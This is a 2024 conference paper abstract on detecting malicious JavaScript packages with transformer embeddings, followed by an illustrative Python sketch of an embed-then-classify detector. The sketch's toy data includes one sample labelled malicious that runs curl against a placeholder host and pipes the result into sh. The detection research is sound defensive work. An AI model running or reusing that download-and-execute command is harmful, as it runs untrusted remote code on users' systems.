Conference paper
Using Pre-trained Transformers to Detect Malicious Source Code Within JavaScript Packages
Document type
Text/Conference Paper
Date
2024
Publisher
Gesellschaft für Informatik e.V.
Abstract
The proliferation of open-source software reuse has led to a significant increase in software supply chain attacks, and the sheer volume of available packages makes malicious ones increasingly hard to identify. Traditional static analysis methods often fail to detect these threats because of the complexity and diversity of code semantics. This paper addresses these challenges by building on the success of transformer models in understanding code semantics. We propose a novel approach that uses pre-trained transformer models to embed source code and then trains classifiers on these embeddings. This methodology enables a more nuanced understanding of code semantics, significantly improving the detection of malicious packages. In extensive experiments, our approach achieves F1-scores as high as 0.98 and an alert rate of 0.09%, demonstrating its effectiveness in detecting malicious code within open-source software supply chains.
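The embed-then-classify pipeline described in the abstract can be illustrated with a minimal sketch. The abstract names neither the transformer model nor the classifier, so everything below is an assumption made for illustration: `toy_embed` is a hashed token-count stand-in for a pre-trained transformer encoder, `CentroidClassifier` is a simple nearest-centroid classifier chosen for brevity, and the two JavaScript snippets are made-up toy data. The sketch only shows how the pieces fit together and how an F1-score is computed; it is not the authors' implementation and does not reproduce their results.

```python
import hashlib
import math
import re
from typing import Callable, Dict, List, Sequence

Vector = List[float]


def toy_embed(source: str, dim: int = 64) -> Vector:
    """Hypothetical stand-in for a pre-trained transformer encoder.

    Hashes each token into one of `dim` buckets and L2-normalises the counts.
    A real pipeline would return the model's pooled hidden state instead.
    """
    vec = [0.0] * dim
    for token in re.findall(r"[A-Za-z_]\w*|\S", source):
        bucket = int(hashlib.md5(token.encode("utf-8")).hexdigest(), 16) % dim
        vec[bucket] += 1.0
    norm = math.sqrt(sum(x * x for x in vec)) or 1.0
    return [x / norm for x in vec]


def _sq_dist(a: Vector, b: Vector) -> float:
    """Squared Euclidean distance between two vectors."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


class CentroidClassifier:
    """Nearest-centroid classifier (an assumed, deliberately simple choice)."""

    def fit(self, X: Sequence[Vector], y: Sequence[int]) -> "CentroidClassifier":
        self.centroids: Dict[int, Vector] = {}
        for label in sorted(set(y)):
            rows = [x for x, t in zip(X, y) if t == label]
            # Mean of each embedding dimension over the rows of this class.
            self.centroids[label] = [sum(col) / len(rows) for col in zip(*rows)]
        return self

    def predict(self, X: Sequence[Vector]) -> List[int]:
        return [
            min(self.centroids, key=lambda c: _sq_dist(x, self.centroids[c]))
            for x in X
        ]


def f1_score(y_true: Sequence[int], y_pred: Sequence[int], positive: int = 1) -> float:
    """Harmonic mean of precision and recall for the `positive` class."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == positive and p == positive)
    fp = sum(1 for t, p in pairs if t != positive and p == positive)
    fn = sum(1 for t, p in pairs if t == positive and p != positive)
    if tp == 0:
        return 0.0
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    return 2 * precision * recall / (precision + recall)


def train_detector(
    embed: Callable[[str], Vector], sources: Sequence[str], labels: Sequence[int]
) -> CentroidClassifier:
    """Embed every source file, then fit the classifier on the embeddings."""
    return CentroidClassifier().fit([embed(s) for s in sources], labels)


if __name__ == "__main__":
    # Made-up toy snippets; label 1 = malicious, 0 = benign.
    sources = [
        'const fs = require("fs"); module.exports = (p) => fs.readFileSync(p, "utf8");',
        'require("child_process").exec("curl http://example.invalid/x | sh");',
    ]
    labels = [0, 1]
    detector = train_detector(toy_embed, sources, labels)
    predictions = detector.predict([toy_embed(s) for s in sources])
    print(predictions, f1_score(labels, predictions))
```

Because the embedder is passed in as a function, swapping `toy_embed` for a call into an actual pre-trained code model would leave the classifier and the evaluation code unchanged.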